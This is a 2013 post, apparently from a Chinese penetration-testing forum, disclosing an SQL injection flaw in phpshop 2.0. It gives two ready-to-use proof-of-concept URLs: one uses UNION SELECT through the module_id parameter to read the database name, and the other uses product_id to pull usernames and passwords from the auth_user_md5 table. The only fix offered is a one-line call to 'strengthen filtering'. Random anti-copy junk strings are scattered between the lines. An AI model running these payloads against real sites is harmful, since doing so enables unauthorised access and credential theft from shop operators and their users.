中国网络渗透测试联盟
标题:
phpshop 2.0 SQL注入及修复
[打印本页]
作者:
admin
时间:
2013-1-18 18:24
标题:
phpshop 2.0 SQL注入及修复
标题 : phpshop 2.0 SQL Injection Vulnerability
( I9 O4 ^2 N/ H" D2 U0 N
/ l5 M3 I, Y/ F+ O7 J
作者 : By onestree
8 u% i2 J8 ~( F: y2 V$ I3 {
下载地址 :
http://code.google.com/p/phpshop/downloads/list
9 o6 p* n) j0 Y6 x$ E9 g0 W: b
测试地址: windows 7 / ubuntu
3 i1 `1 x! l5 F3 ?
; H! j' {2 ^+ B" j. J4 F
- o( }# t4 h u8 Y' k% e+ B3 i
SQLi p0c:
% U/ [) u9 w) G' [ q9 g
8 A3 G$ z ~, a8 S: B5 @ E& |
==================
, Q; F* k3 ]6 d0 l
4 z+ f8 w3 y" G+ e5 U7 m
http://www.xxx.com
/phpshop 2.0/?page=admin/function_list&module_id=11'
! {: P0 y" ^0 H
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
' I/ J- U( F4 o2 d+ C
D) I9 {( ~' n" [# x0 {7 B! S* a
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
7 @9 ^* f! R9 T s' b) ~
4 F5 e( F! t* D! Z$ e6 _! D* l
修复:
: g2 U# _ ~2 Z1 W# J
加强过滤
+ ?; _5 T9 T6 U, }
" b2 y1 v" c, I P2 n* C
7 I% H3 d$ l: u: N6 _9 \% i5 t- Y/ n
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2